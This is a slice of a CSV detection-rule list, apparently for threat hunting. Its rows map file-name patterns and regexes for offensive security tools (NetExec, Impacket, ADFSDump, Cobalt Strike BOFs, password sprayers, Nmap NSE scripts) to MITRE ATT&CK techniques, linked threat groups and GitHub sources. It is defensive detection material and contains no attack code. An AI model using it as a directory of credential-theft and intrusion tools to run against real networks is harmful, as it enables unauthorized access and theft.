"*/add_computer.py*",".{0,1000}\/add_computer\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","5166"
"*/add_groupmember.py*",".{0,1000}\/add_groupmember\.py.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","N/A","2","120","12","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z","5167"
"*/add-admin.exe*",".{0,1000}\/add\-admin\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","5168"
"*/addcomputer.py*",".{0,1000}\/addcomputer\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","5169"
"*/addcomputer_LDAP_spn.py*",".{0,1000}\/addcomputer_LDAP_spn\.py.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","1","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","5170"
"*/addcomputer_with_spns.py*",".{0,1000}\/addcomputer_with_spns\.py.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","1","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","5171"
"*/Add-KeeThiefLurker.ps1*",".{0,1000}\/Add\-KeeThiefLurker\.ps1.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","1","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","5172"
"*/AddNewAdminUser.ahk*",".{0,1000}\/AddNewAdminUser\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","5173"
"*/Add-RemoteRegBackdoor.ps1*",".{0,1000}\/Add\-RemoteRegBackdoor\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","5174"
"*/address-info.nse*",".{0,1000}\/address\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5175"
"*/AddScriptToRegistry.ahk*",".{0,1000}\/AddScriptToRegistry\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","5176"
"*/AddTrustedDomain.py*",".{0,1000}\/AddTrustedDomain\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","5177"
"*/AddTrustedDomain.vba*",".{0,1000}\/AddTrustedDomain\.vba.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","5178"
"*/AddUser-Bof.*",".{0,1000}\/AddUser\-Bof\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","N/A","10","10","71","14","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z","5179"
"*/AddUser-Bof/*",".{0,1000}\/AddUser\-Bof\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","N/A","10","10","71","14","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z","5180"
"*/ADeleg.exe*",".{0,1000}\/ADeleg\.exe.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","1","N/A","N/A","8","3","294","31","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z","5181"
"*/ADeleg.exe*",".{0,1000}\/ADeleg\.exe.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","1","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","5182"
"*/adeleg.git*",".{0,1000}\/adeleg\.git.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","1","N/A","N/A","8","3","294","31","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z","5183"
"*/adeleg.pdb*",".{0,1000}\/adeleg\.pdb.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","1","N/A","N/A","8","3","294","31","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z","5184"
"*/ADeleginator.git*",".{0,1000}\/ADeleginator\.git.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","1","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","5185"
"*/adfsbrute.git*",".{0,1000}\/adfsbrute\.git.{0,1000}","offensive_tool_keyword","adfsbrute","test credentials against Active Directory Federation Services (ADFS) allowing password spraying or bruteforce attacks","T1110.003 - T1110.001 - T1110","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ricardojoserf/adfsbrute","1","1","N/A","N/A","8","2","172","33","2021-04-23T16:43:59Z","2020-10-02T16:28:35Z","5187"
"*/adfsbrute.py*",".{0,1000}\/adfsbrute\.py.{0,1000}","offensive_tool_keyword","adfsbrute","test credentials against Active Directory Federation Services (ADFS) allowing password spraying or bruteforce attacks","T1110.003 - T1110.001 - T1110","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ricardojoserf/adfsbrute","1","1","N/A","N/A","8","2","172","33","2021-04-23T16:43:59Z","2020-10-02T16:28:35Z","5188"
"*/ADFSDump.exe*",".{0,1000}\/ADFSDump\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","5189"
"*/ADFSDump.exe*",".{0,1000}\/ADFSDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","5190"
"*/ADFSDump.git*",".{0,1000}\/ADFSDump\.git.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","1","N/A","N/A","10","4","349","67","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z","5191"
"*/ADFSDump-PS.git*",".{0,1000}\/ADFSDump\-PS\.git.{0,1000}","offensive_tool_keyword","ADFSDump-PS","ADFSDump to assist with GoldenSAML","T1078 - T1552.004 - T1558.004","TA0006 ","N/A","N/A","Credential Access","https://github.com/ZephrFish/ADFSDump-PS","1","1","N/A","N/A","10","1","31","8","2024-05-20T00:00:19Z","2024-05-19T00:46:28Z","5192"
"*/ADFSpoof.py*",".{0,1000}\/ADFSpoof\.py.{0,1000}","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1550.004 - T1071 - T1606","TA0006 - TA0011 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","1","N/A","N/A","10","4","391","62","2024-08-12T08:13:42Z","2019-03-20T22:30:58Z","5193"
"*/ADFSpray*",".{0,1000}\/ADFSpray.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","N/A","1","87","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z","5194"
"*/ADFSRelay.git*",".{0,1000}\/ADFSRelay\.git.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","Black Basta","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","1","N/A","N/A","10","2","179","15","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z","5195"
"*/ADFSRelay.go*",".{0,1000}\/ADFSRelay\.go.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","Black Basta","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","1","N/A","N/A","10","2","179","15","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z","5196"
"*/adfs-spray.py*",".{0,1000}\/adfs\-spray\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","1","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","5197"
"*/ADHunt.git*",".{0,1000}\/ADHunt\.git.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","5199"
"*/adhunt.py*","\/adhunt\.py","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","5200"
"*/adidnsdump.git*",".{0,1000}\/adidnsdump\.git.{0,1000}","offensive_tool_keyword","adidnsdump","By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones. similar to a zone transfer. This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.","T1018 - T1087 - T1201 - T1056 - T1039","TA0005 - TA0009","N/A","N/A","Discovery","https://github.com/dirkjanm/adidnsdump","1","1","N/A","N/A","N/A","10","997","118","2025-04-04T09:28:20Z","2019-04-24T17:18:46Z","5201"
"*/ad-ldap-enum.git*",".{0,1000}\/ad\-ldap\-enum\.git.{0,1000}","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/CroweCybersecurity/ad-ldap-enum","1","1","N/A","AD Enumeration","6","4","308","66","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z","5202"
"*/adlogin.ps1*",".{0,1000}\/adlogin\.ps1.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","1","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","5203"
"*/adm2sys.py*",".{0,1000}\/adm2sys\.py.{0,1000}","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","1","N/A","N/A","9","1","11","7","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z","5204"
"*/admin/smb/ms17_010_command*",".{0,1000}\/admin\/smb\/ms17_010_command.{0,1000}","offensive_tool_keyword","metasploit","exploit used by Dispossessor ransomware group","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","5205"
"*/admin_persistence_winlogon.c*",".{0,1000}\/admin_persistence_winlogon\.c.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","1","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","5206"
"*/Admin2Sys.git*",".{0,1000}\/Admin2Sys\.git.{0,1000}","offensive_tool_keyword","Admin2Sys","Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM","T1055.002 - T1078.003 - T1068","TA0002 - TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/S12cybersecurity/Admin2Sys","1","1","N/A","N/A","10","1","54","19","2023-05-01T19:32:41Z","2023-05-01T18:50:51Z","5207"
"*/admin-panels.txt*",".{0,1000}\/admin\-panels\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","5208"
"*/adPEAS.git*",".{0,1000}\/adPEAS\.git.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration -  wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","1","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","5209"
"*/adPEAS.ps1*",".{0,1000}\/adPEAS\.ps1.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration -  wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","1","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","5210"
"*/adPEAS-Light.ps1*",".{0,1000}\/adPEAS\-Light\.ps1.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration -  wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","1","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","5211"
"*/ADSearch.exe*",".{0,1000}\/ADSearch\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","5215"
"*/ADSearch.exe*",".{0,1000}\/ADSearch\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","5216"
"*/ADSearch.git*",".{0,1000}\/ADSearch\.git.{0,1000}","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","N/A","6","536","57","2024-09-25T16:13:13Z","2020-06-17T22:21:41Z","5217"
"*/aerosol.py*",".{0,1000}\/aerosol\.py.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","#linux","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","5220"
"*/afp-brute.nse*",".{0,1000}\/afp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5221"
"*/afp-ls.nse*",".{0,1000}\/afp\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5222"
"*/afp-path-vuln.nse*",".{0,1000}\/afp\-path\-vuln\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5223"
"*/afp-serverinfo.nse*",".{0,1000}\/afp\-serverinfo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5224"
